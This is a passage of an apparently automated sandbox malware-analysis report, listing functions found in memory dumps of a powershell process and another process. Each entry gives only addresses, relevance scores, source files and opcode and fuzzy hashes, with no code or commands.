                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab08ade83727d0f0f407fae0699b4d47ceb4e13128f230e65ff4739efaffaa63
                                • Instruction ID: 91ef0a48a42fd629cb05637ac088d6de3885b00043c2e8ab02a3e6586527777c
                                • Opcode Fuzzy Hash: ab08ade83727d0f0f407fae0699b4d47ceb4e13128f230e65ff4739efaffaa63
                                • Instruction Fuzzy Hash: B9E0D8527011109F960473B998206E6769DDBCA678B8562F7CE11CB2E2ED04EC1943F2
                                Function 04E5DED8 Relevance: .0, Instructions: 30COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 39c6556d9285d0e4712be04f19453bdd34f51c239e62453df83b32d004177ca2
                                • Instruction ID: 501667109972b921ca9310c7790131ad236ffe99de4b773934f5ffe9acb713fc
                                • Opcode Fuzzy Hash: 39c6556d9285d0e4712be04f19453bdd34f51c239e62453df83b32d004177ca2
                                • Instruction Fuzzy Hash: 30E01A357001158F87109F5DD898C26B7FAEFCE72932950AAF94ACB735DA61EC01CBA0
                                Function 04E5896A Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: befbad624561d485897f724c47e6072d084fe1eb06245b8e3b6618d100eb9fde
                                • Instruction ID: 94380bf11d736ac528ab8eafa56e40a3e84a01ddacf77a60bfbd63044e1fb12d
                                • Opcode Fuzzy Hash: befbad624561d485897f724c47e6072d084fe1eb06245b8e3b6618d100eb9fde
                                • Instruction Fuzzy Hash: 9BF0A7357097918FDF0A277494582EE3B61EF86715F0540AFD545CB292CF742805C3D5
                                Function 04E5AF98 Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6a03dd16f04bf798fe26b4ad4e46b51abeb6956ad2e50affb291ab3fab38179c
                                • Instruction ID: 2f1aa634fc7ab4f8e8fbf44efe4ff7b32c8598c1521d7318dd3b4bc7182c5629
                                • Opcode Fuzzy Hash: 6a03dd16f04bf798fe26b4ad4e46b51abeb6956ad2e50affb291ab3fab38179c
                                • Instruction Fuzzy Hash: CEE0D8213083951FC716876DA820492BB779FC772030885FBE480CF266ED51A80683A0
                                Function 04E59170 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42f4b8459b3c2d80b8982ca830b7acb4a2629a81d9b0355c135d3b2c8ecee844
                                • Instruction ID: 5dfdc168265f3bf87a8de578cdb10a9a4beb544885722df8b972d405a965bfc1
                                • Opcode Fuzzy Hash: 42f4b8459b3c2d80b8982ca830b7acb4a2629a81d9b0355c135d3b2c8ecee844
                                • Instruction Fuzzy Hash: 09F06D709013148BD760DF78D49C39ABBE9EB44314F00442DD60EC7340DB397881CB90
                                Function 04E5DD76 Relevance: .0, Instructions: 24COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8f1199b243b290ece32680f92a9c292c4e979cff6d0ae24edb508bc94f9b2c12
                                • Instruction ID: d385f9b7011956abb95dc21ef744200325a357cc0769eca03307b8a0c72c9bfc
                                • Opcode Fuzzy Hash: 8f1199b243b290ece32680f92a9c292c4e979cff6d0ae24edb508bc94f9b2c12
                                • Instruction Fuzzy Hash: 8EE04F31B00014ABCB089699D8508E9F7AADBCD220F04C07AD90AA7350EE3269158AA1
                                Function 04E58978 Relevance: .0, Instructions: 24COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5772ab4dc9637c67db41b34ddb59a1a8701a0e1a34284f4d5c16c39b7ff1521
                                • Instruction ID: c64e350c106e5e071ba80512a9b7784b8993fbc000ee3934d622d9a0bb7a251d
                                • Opcode Fuzzy Hash: d5772ab4dc9637c67db41b34ddb59a1a8701a0e1a34284f4d5c16c39b7ff1521
                                • Instruction Fuzzy Hash: A8E0923530431047CF082774940C29D7756DBC4724F04412ED605C7341CF64680183D5
                                Function 04E59558 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2524c313e729d4da92642d606696eb2d8176554ee2c8bad196cb951854266df4
                                • Instruction ID: 18f87dd1b692c5b27178d3cb2a8f5a5ee1dc7c1c3d22e993c665cef0243ca10a
                                • Opcode Fuzzy Hash: 2524c313e729d4da92642d606696eb2d8176554ee2c8bad196cb951854266df4
                                • Instruction Fuzzy Hash: 93D05E52B011254B5A5432AE18006BBA5DEDBC54A9B9520B69F05D3262EC44EC2A03F2
                                Function 04E5DD78 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                • Instruction ID: c07ad3fa0ad2d4489fdecb34aa37d1b9a74b375ca222e4a4504fc840219e799a
                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                • Instruction Fuzzy Hash: D7E08631B0001497CB089559D8108DDF7AADBCC220F04C07ADD0AA7350DE32691586E1
                                Function 04E5DD28 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9bdf4e67da762cace18cf9da3e08bf2dd127d6ba3353607547de5f083a1eb77d
                                • Instruction ID: 13825b51fcd16cf058695c42d977555c5be31a001314c4737f2f79802e36d04b
                                • Opcode Fuzzy Hash: 9bdf4e67da762cace18cf9da3e08bf2dd127d6ba3353607547de5f083a1eb77d
                                • Instruction Fuzzy Hash: C7E0C236340714178616A61EAC10C9FBBDEDFC5671311803EE40ECB310DE64EC058BE5
                                Function 04E58739 Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8edb67002d799b8bf6c3848bb54f90dea98abf127ef4cab02af39f7602ae0d7d
                                • Instruction ID: 0cfcebc8201d39d75b3014908247523b5610847cae43da01779d385826f19b0d
                                • Opcode Fuzzy Hash: 8edb67002d799b8bf6c3848bb54f90dea98abf127ef4cab02af39f7602ae0d7d
                                • Instruction Fuzzy Hash: ACE04F30845209CFCB09EFA4E81A4EEBB30FF16301B4041EDE956872A1EB31265ACBC0
                                Function 04E5F860 Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3db91a4529258567650b32386371258d4dd94a0854ccb81ff9d812c3e4b92b57
                                • Instruction ID: ebc004407878d857f87bbeb925fda748652f83d05c37ad886cc8cb34738b6347
                                • Opcode Fuzzy Hash: 3db91a4529258567650b32386371258d4dd94a0854ccb81ff9d812c3e4b92b57
                                • Instruction Fuzzy Hash: 5FE0E570E056458FCB45EFB884521AABFE0AF49210B6485AEC94ADA601E7314612CB92
                                Function 04E58800 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f622c0bb97fa4aa1c3d364f8f186d8b03b46f36a6ebc7de87058257616e03cec
                                • Instruction ID: 8679d43aed9520c50ecfffde6e9131618a1a6b23d705e8c4ce713ea61c8c953c
                                • Opcode Fuzzy Hash: f622c0bb97fa4aa1c3d364f8f186d8b03b46f36a6ebc7de87058257616e03cec
                                • Instruction Fuzzy Hash: B2E04F36A0924BCFCB44EF64D0955EEBFB0FF0A305B0084A9ED8597355EB316850DB81
                                Function 04E5F870 Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                • Instruction ID: 73c6c26a664d1a7698c376fb48a8711d4225d6e74d1af24e60bb35b48c77e359
                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                • Instruction Fuzzy Hash: E6D06270D042099F8780EFADC94156DFBF4EB48200F5085AA8919E7311F7315612DBD1
                                Function 04E58748 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 576e237fa799e056ea0d953cf0991ffd08f170e450a1a23f883c926318c07a27
                                • Instruction ID: 219d7ec8f0c8367be6be579e928c2d4df91183b321c5da899c909b67f3807065
                                • Opcode Fuzzy Hash: 576e237fa799e056ea0d953cf0991ffd08f170e450a1a23f883c926318c07a27
                                • Instruction Fuzzy Hash: 5CD06731905209CBCB08ABA5E85A4FDBB74FB14301F40416DE92792191EB313A5ACAC5
                                Function 04E58810 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53f6d6e5562d6c366206fc920279b4d9061c6f641ef52594ce80120bdf704fc0
                                • Instruction ID: 6def1e588d0d3c15d1335d38c7f43cfdc22fc990c9a4e4bb6c07967da9f4a7cb
                                • Opcode Fuzzy Hash: 53f6d6e5562d6c366206fc920279b4d9061c6f641ef52594ce80120bdf704fc0
                                • Instruction Fuzzy Hash: 8BD01735A0830A8BCB08EFA4E4468AEBBB4EB45201F008169ED4993350EB307811CBC1
                                Function 04E57932 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c0b6c05fd69052a1b87dd2706bc6096336830c6d4377bdcb9effd4f165b2286
                                • Instruction ID: a78c0686d6cc454c854287e336cc78782a9cfdd7fef7b1ea46cddbd9aa3aee94
                                • Opcode Fuzzy Hash: 1c0b6c05fd69052a1b87dd2706bc6096336830c6d4377bdcb9effd4f165b2286
                                • Instruction Fuzzy Hash: C3D0A771009344CFC7061B3498181443B24DB53206B5604CDD8494B2A38515A84A8721
                                Function 04E57EA0 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 907bf64e2c5dd051e21adc43736f7ee983e869ac02e2c796d472841c30162197
                                • Instruction ID: 1825f77b31c5870f37e850b4bd68266b827f2851c842eefda4edb6e94dee58e7
                                • Opcode Fuzzy Hash: 907bf64e2c5dd051e21adc43736f7ee983e869ac02e2c796d472841c30162197
                                • Instruction Fuzzy Hash: 05C09BD3A2D3C14FEF0292314C6535DBF71556355574F55C2D891EB3A2D9248805C762
                                Function 04E57940 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 98ddc0ee10999a26ae71a252676f936b909547fdc1d33360ca995336a92f5109
                                • Instruction ID: a2eb27e9f84e6ec5f57aeac10ba9ea8bd5ddb2cf0c72a905801850bb5de8955f
                                • Opcode Fuzzy Hash: 98ddc0ee10999a26ae71a252676f936b909547fdc1d33360ca995336a92f5109
                                • Instruction Fuzzy Hash: 8DB092300457089FC2487F79A4089147329EB4521978004ECE90E0A2928F36E889CA45

                                Non-executed Functions

                                Function 07CC0FB2 Relevance: 11.4, Strings: 9, Instructions: 186COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: fbq$`Q]q$`Q]q$tP]q$$]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-810355167
                                • Opcode ID: 5953f0a1a9fd97b4a3dddd76e49976a0dec7c7594c5686ebb1845b8aa06d1cfe
                                • Instruction ID: e13310297db92eae814f02cbc9793353e8c179279d8bba748b738a7fa092f634
                                • Opcode Fuzzy Hash: 5953f0a1a9fd97b4a3dddd76e49976a0dec7c7594c5686ebb1845b8aa06d1cfe
                                • Instruction Fuzzy Hash: 2D6180F061424EDFEB24CE4BC584BAA77F2BB45355F2C8059E8019B292C735DE81CBA1
                                Function 07CC3928 Relevance: 10.3, Strings: 8, Instructions: 321COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-1910532044
                                • Opcode ID: ac34ebe27cf1d08ca9714f1149f7620364fe329b1ac6667476ad8bdec51eff15
                                • Instruction ID: bfe4220e539dfa485e1a3c018c73565a24aadad04a52e622d09a97f170f3a010
                                • Opcode Fuzzy Hash: ac34ebe27cf1d08ca9714f1149f7620364fe329b1ac6667476ad8bdec51eff15
                                • Instruction Fuzzy Hash: 8BA198B13043858FC725DB79A85476ABFE6EFC6610F18C4AFD845DB291CA31C941C7A2
                                Function 07CC1BE0 Relevance: 9.1, Strings: 7, Instructions: 397COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q$pij$tP]q$tP]q
                                • API String ID: 0-532307603
                                • Opcode ID: aae0093201574b322a6df92dde8a5cf8b85ad08a050b1716c92977c8dc1cad81
                                • Instruction ID: 4d7766178a2b7b1e5904ed7d61d3bfeba0c9e5168bf31e5300eb6843aea6b055
                                • Opcode Fuzzy Hash: aae0093201574b322a6df92dde8a5cf8b85ad08a050b1716c92977c8dc1cad81
                                • Instruction Fuzzy Hash: 70D138F1B0430A8FC725DB6E944466ABBFAAF82310F18C4AFD945CB256DB31C945C7A1
                                Function 07CC0568 Relevance: 6.7, Strings: 5, Instructions: 415COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: fbq$4']q$4']q$4']q$4']q
                                • API String ID: 0-2283484764
                                • Opcode ID: 3c14d4b21514d7b37a542e01cf5533fae2b6f7df445d857917614fde07017a98
                                • Instruction ID: b84d059472eba8a4bd16c2cbf39e1b5117eedf7cb3a32ae140065d63d782c40b
                                • Opcode Fuzzy Hash: 3c14d4b21514d7b37a542e01cf5533fae2b6f7df445d857917614fde07017a98
                                • Instruction Fuzzy Hash: B5D125B0704355CFC715DB6898517AABBA2AFC2210F14C4BFE545CB292CB358D86CBE2
                                Function 07CC3678 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                • API String ID: 0-2353078639
                                • Opcode ID: 660c95e552b84e6cb5e7bde60b175c036befa134379865b2975ec4433a4e94da
                                • Instruction ID: 6f3ad1f6668f4a5ec5a7f83c544463fafa7438aa50ff6e8dfa276a1549cc99dd
                                • Opcode Fuzzy Hash: 660c95e552b84e6cb5e7bde60b175c036befa134379865b2975ec4433a4e94da
                                • Instruction Fuzzy Hash: 2D5188F17043868FCB25DA29AA4166ABBA6AFC2210F24C46FD445CB251DB35C945CBA3
                                Function 04E57A21 Relevance: 5.2, Strings: 4, Instructions: 243COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 22e9efcfc201ca510467cc12c5a0b16d517ac9191216e245d05ea263027c2a89
                                • Instruction ID: 20a4b6f5d31b7b9dacceed512a4d4deb4127a5aee55cfac887ee8e2f2a52aae9
                                • Opcode Fuzzy Hash: 22e9efcfc201ca510467cc12c5a0b16d517ac9191216e245d05ea263027c2a89
                                • Instruction Fuzzy Hash: 50B1A374E002099FDB55DFA9D980A9DFBF6FF48304F20862AD819AB314DB34A905CF90
                                Function 04E57A30 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 060cf1d9bf6ea54c31f34fe810e054bde73b2e0d527787d0eab241a932d59801
                                • Instruction ID: 2776d8880e20fef90a9755e3492f9659cb7bced6e9875d4fabcbff12ce455865
                                • Opcode Fuzzy Hash: 060cf1d9bf6ea54c31f34fe810e054bde73b2e0d527787d0eab241a932d59801
                                • Instruction Fuzzy Hash: E3B19474E002199FDB54DFA9D991A9DFBF6FF48304F20862AD819AB314DB34A905CF90
                                Function 04E57220 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 3f57356262512ef5b799a71154ce1c8b70a0f2c5c46bf6c073b3de8c01699d19
                                • Instruction ID: db26dbcd2f1f0214328ce8bab5fa6abb3eaccf0aaebb1ddbffb2b8923debeb2b
                                • Opcode Fuzzy Hash: 3f57356262512ef5b799a71154ce1c8b70a0f2c5c46bf6c073b3de8c01699d19
                                • Instruction Fuzzy Hash: A8817174E012199FDB44DFA9D990A9DFBF6FF48304F20822AD819AB314E734A915CF90
                                Function 07CC5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q$$]q
                                • API String ID: 0-858218434
                                • Opcode ID: f169bd2233c56fb1ea46da6b3ab415bf21455ca990ff2b990746d2a5a31e1c0f
                                • Instruction ID: 6ae017b6efc70e3f875441f251e0b5ade5192e01e4506f39e7d0db7c80ef7278
                                • Opcode Fuzzy Hash: f169bd2233c56fb1ea46da6b3ab415bf21455ca990ff2b990746d2a5a31e1c0f
                                • Instruction Fuzzy Hash: AF218EB17603059FDB34957E69817277BD69BC0715F30842EE805CB382DD35E551C360
                                Function 07CC030A Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q
                                • API String ID: 0-978391646
                                • Opcode ID: 906a2a89951030ce4f9047d255a0431de2e6b4b096e90d8119939c24de22a56e
                                • Instruction ID: fdaa9c3ae8bfe7902ee6db4063a4f8a0ac36d4588eb8a91496d5402e550092e9
                                • Opcode Fuzzy Hash: 906a2a89951030ce4f9047d255a0431de2e6b4b096e90d8119939c24de22a56e
                                • Instruction Fuzzy Hash: 8B01F26130D3968FC72B532C1D6016A6FB65F8396072E05DBC481DF393C9288D4A83E7

                                Executed Functions

                                Function 02AF13E0 Relevance: 4.2, Strings: 3, Instructions: 440COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q
                                • API String ID: 0-182748909
                                • Opcode ID: dbbd9f5f2d05521aeec6df830a8ad73cb4a43530cf70d98402cb75a2d2fc76ca
                                • Instruction ID: 465d05e9cfdd1580435825fac527314f7cbe8f2e5ddf889e76efed57025a028e
                                • Opcode Fuzzy Hash: dbbd9f5f2d05521aeec6df830a8ad73cb4a43530cf70d98402cb75a2d2fc76ca
                                • Instruction Fuzzy Hash: 00F1B0347002058FDB5AAB75E858B6E7BA7FF88704F148528E50ADB3A9DF759C01CB81
                                Function 02AF13D0 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: 2098570656fa0c1c389553bde11163929c8354fdd3a2cb46c37dd6626c9b18cf
                                • Instruction ID: e15090fc71661e0d5664eaacd71ad543d7a62781722ffd55c63681515835c234
                                • Opcode Fuzzy Hash: 2098570656fa0c1c389553bde11163929c8354fdd3a2cb46c37dd6626c9b18cf
                                • Instruction Fuzzy Hash: B7C1A034700205CFDB5AAB74E858B6E77A7BF88704F148528D50ADB3A9DF799C06CB81
                                Function 02AF14C2 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: 4452823951a6a70804b4bd1cb9a62ac7613c1625e0363c226082492843018442
                                • Instruction ID: 5a643c1ab00a4fe21cdee8bca768adfc5b22938726860a0473e20f24a845ae62
                                • Opcode Fuzzy Hash: 4452823951a6a70804b4bd1cb9a62ac7613c1625e0363c226082492843018442
                                • Instruction Fuzzy Hash: 89A1A234700201CFDB59AB75D95876E76A7BF88704F148528E90EDB399DF399C02CB91
                                Function 02AF0DF0 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: ad77e61d1655bae8eaa2a8fd64376057d2c99e62c76f1f9334bbf5f5957abea9
                                • Instruction ID: 3858b2b69e668d864eb81d6c40f08e52eac3932bb40faf06b460f6a893a0fdb4
                                • Opcode Fuzzy Hash: ad77e61d1655bae8eaa2a8fd64376057d2c99e62c76f1f9334bbf5f5957abea9
                                • Instruction Fuzzy Hash: FF212330B102159FCB99EB78885467E7BF3AFC9204F14846DD149DB39AEE349D028792
                                Function 02AF0E00 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
